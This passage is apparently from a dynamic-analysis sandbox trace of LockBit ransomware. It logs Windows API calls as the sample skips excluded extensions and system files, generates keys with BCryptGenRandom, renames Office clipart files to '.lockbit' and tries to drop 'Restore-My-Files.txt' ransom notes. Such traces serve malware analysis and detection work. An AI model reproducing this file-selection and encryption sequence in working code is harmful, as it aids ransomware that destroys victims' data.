(lpString1=".shs", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.505] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.505] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.506] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.506] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105246.WMF") returned 1 [0138.506] lstrcmpiW (lpString1="ntldr", lpString2="J0105246.WMF") returned 1 [0138.506] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105246.WMF") returned 1 [0138.506] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105246.WMF") returned -1 [0138.506] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105246.WMF") returned -1 [0138.506] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105246.WMF") returned 1 [0138.506] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105246.WMF") returned -1 [0138.506] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.506] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF") returned=".WMF" [0138.506] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.506] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.506] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.506] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.506] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.506] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.506] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.506] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.506] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.506] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.506] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.506] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.507] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.507] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF.lockbit") returned 72 [0138.507] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0138.508] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.508] malloc (_Size=0x40068) returned 0x3d70450 [0138.508] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=19328) returned 1 [0138.508] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0138.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0138.510] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.514] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.514] malloc (_Size=0xa6) returned 0x77d7a8 [0138.514] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.515] free (_Block=0x77d7a8) [0138.515] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.516] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.516] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.516] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1214, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105250.WMF", cAlternateFileName="")) returned 1 [0138.516] lstrcmpiW (lpString1=".", lpString2="J0105250.WMF") returned -1 [0138.516] lstrcmpiW (lpString1="..", lpString2="J0105250.WMF") returned -1 [0138.516] PathFindExtensionW (pszPath="J0105250.WMF") returned=".WMF" [0138.516] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.516] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.516] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.516] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.516] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.516] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.516] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.516] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.516] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.516] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.516] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.516] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.516] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.516] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.517] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.517] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.518] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.518] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.518] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.518] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.518] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.518] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.518] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.518] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.518] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.518] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.518] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.518] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105250.WMF") returned 1 [0138.518] lstrcmpiW (lpString1="ntldr", lpString2="J0105250.WMF") returned 1 [0138.518] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105250.WMF") returned 1 [0138.518] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105250.WMF") returned -1 [0138.518] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105250.WMF") returned -1 [0138.518] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105250.WMF") returned 1 [0138.518] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105250.WMF") returned -1 [0138.518] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.531] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF") returned=".WMF" [0138.531] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.531] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.531] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.531] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.531] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.531] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.531] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.531] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.531] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.531] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.531] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.532] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.532] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF.lockbit") returned 72 [0138.532] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105250.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0138.537] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.537] malloc (_Size=0x40068) returned 0x3e70008 [0138.537] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=4628) returned 1 [0138.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.538] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0138.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.539] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0138.539] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0138.542] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.542] malloc (_Size=0xa6) returned 0x77d7a8 [0138.542] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.543] free (_Block=0x77d7a8) [0138.543] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105250.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.543] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.543] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.544] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1714, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105266.WMF", cAlternateFileName="")) returned 1 [0138.544] lstrcmpiW (lpString1=".", lpString2="J0105266.WMF") returned -1 [0138.544] lstrcmpiW (lpString1="..", lpString2="J0105266.WMF") returned -1 [0138.544] PathFindExtensionW (pszPath="J0105266.WMF") returned=".WMF" [0138.544] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.544] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.545] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.545] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.546] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.546] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.546] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105266.WMF") returned 1 [0138.546] lstrcmpiW (lpString1="ntldr", lpString2="J0105266.WMF") returned 1 [0138.546] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105266.WMF") returned 1 [0138.546] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105266.WMF") returned -1 [0138.546] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105266.WMF") returned -1 [0138.546] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105266.WMF") returned 1 [0138.546] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105266.WMF") returned -1 [0138.546] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.546] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF") returned=".WMF" [0138.546] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.546] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.546] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.546] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.546] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.546] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.546] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.546] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.546] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.546] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.546] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.547] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.547] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF.lockbit") returned 72 [0138.547] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105266.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0138.548] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.548] malloc (_Size=0x40068) returned 0x3df0008 [0138.548] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5908) returned 1 [0138.548] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.549] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.549] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.549] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.550] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.555] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: 